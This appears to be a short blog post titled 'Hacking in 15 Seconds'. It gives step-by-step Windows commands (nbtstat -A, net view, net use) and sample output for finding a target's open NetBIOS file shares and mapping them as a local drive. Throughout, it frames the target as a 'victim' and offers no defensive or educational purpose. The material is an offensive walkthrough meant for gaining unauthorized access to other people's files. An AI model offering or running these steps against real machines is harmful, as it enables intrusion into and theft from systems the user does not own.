HACKING IN 15 SECONDS

system intrusion in 15 sec............

this how hackers attack the box ..........................

if your victim possess certain security flaws then her system can be broken into in less that 15 seconds.

This is how : -

Click "Start -> Run -> cmd"

Type the following at the Dos Prompt

Nbtstat –A IP address [e.g: nbtstat –A 207.175.1.1]

This will give you a read out that looks like this

NetBIOS Remote Machine Name Table
______________________________
Name Type Status
______________________________

abhi <00> UNIQUE Registered
WORK <00> GROUP Registered
abhi <03> UNIQUE Registered
abhi <20> UNIQUE Registered
WORK <1e> GROUP Registered
WORK <1d> UNIQUE Registered
__MSBROWSE__.<01>GROUP Registered ____________________________________

The numbers in the <> are hex code values. What we are interested in is the “Hex Code” number of <20>. A hex code of <20> means you have file and printer sharing turned on.

Next step is to find out what is being shared. This is how : -
Net view \\
[e.g : net view \\207.175.1.1]

You will then get a response that looks something like this. Shared resources at \\ip_address Sharename Type Comment

______________________
MY DOCUMENTS Disk
TEMP Disk
_______________________

The command was completed successfully.)


This shows you that your potential victim has their My Documents Folder shared and their Temp directory shared. For you to then get access to those folders next command will be.

Net use x: \\\temp
[e.g : net use x: \\207.175.1.1\temp]

If all goes well for you, you will then get a response of
(The command was completed successfully.)
Open my computer you will see your victim's temp folder there.

No comments:

Post a Comment